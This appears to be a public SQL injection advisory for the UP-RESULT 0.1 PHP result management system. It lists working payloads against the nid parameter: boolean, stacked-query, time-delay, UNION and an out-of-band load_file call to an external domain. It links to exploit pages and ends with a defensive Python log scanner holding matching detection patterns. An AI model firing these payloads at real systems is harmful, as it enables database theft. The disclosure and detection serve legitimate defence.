UP-RESULT 0.1 2024 SQL Injection
UP-RESULT version 0.1 2024 suffers from a remote SQL injection vulnerability.
## Title: upresult_0.1-2024 Multiple-SQLi
## Author: nu11secur1ty
## Date: 04/08/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The nid parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+' was submitted in the nid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/upresult_0.1-2024)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/04/upresult01-2024-multiple-sqli.html)

## Time spent:
00:15:00
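
A log-review sketch for the payload classes listed for the nid parameter above, added here as an example and not taken from the advisory or the application: it flags any request whose nid value is not purely numeric and labels which technique the value resembles. The numeric-only rule, the `/view.php` path, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures modelled on the payload classes the advisory lists for nid.
SIGNATURES = [
    ("oob_load_file", re.compile(r"load_file\s*\(", re.I)),
    ("union", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("stacked", re.compile(r";\s*select\b", re.I)),
    ("time_delay", re.compile(r"\bsleep\s*\(", re.I)),
    ("boolean", re.compile(r"\b(?:or|and)\s+'?\w+'?\s*=\s*'?\w+", re.I)),
]
# Request field of a common/combined access-log line (assumed log format).
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; /view.php and collab.example are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Apr/2024:10:00:01 +0000] "GET /view.php?nid=145448807 HTTP/1.1" 200 512',
    '203.0.113.9 - - [08/Apr/2024:10:00:02 +0000] "GET /view.php?nid=145448807%27%20or%20%271766%27%3D%271766 HTTP/1.1" 200 9001',
    '203.0.113.9 - - [08/Apr/2024:10:00:09 +0000] "GET /view.php?nid=145448807%27%3BSELECT%20SLEEP(7)%23 HTTP/1.1" 200 512',
    '203.0.113.9 - - [08/Apr/2024:10:00:10 +0000] "GET /view.php?nid=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL%23 HTTP/1.1" 200 700',
    '203.0.113.9 - - [08/Apr/2024:10:00:11 +0000] "GET /view.php?nid=%27%2B(select%20load_file(%27%5C%5C%5C%5Ccollab.example%5C%5Ctuh%27))%2B%27 HTTP/1.1" 200 512',
]

def classify(nid):
    """Return [] for a plain numeric nid, else the labels of matching signatures."""
    if re.fullmatch(r"[0-9]+", nid):
        return []
    hits = [name for name, rx in SIGNATURES if rx.search(nid)]
    return hits or ["non_numeric"]

def scan(lines):
    """Return (client_ip, decoded_nid, labels) for every suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs URL-decodes the value, so encoded quotes and spaces are seen.
        for nid in parse_qs(urlsplit(target).query).get("nid", []):
            labels = classify(nid)
            if labels:
                findings.append((client, nid, labels))
    return findings

if __name__ == "__main__":
    for client, nid, labels in scan(SAMPLE_LOG):
        print(client, labels, repr(nid))
```

A hit labelled `oob_load_file` is worth correlating with outbound DNS or SMB traffic from the database host, since the advisory confirmed the injection through an external interaction.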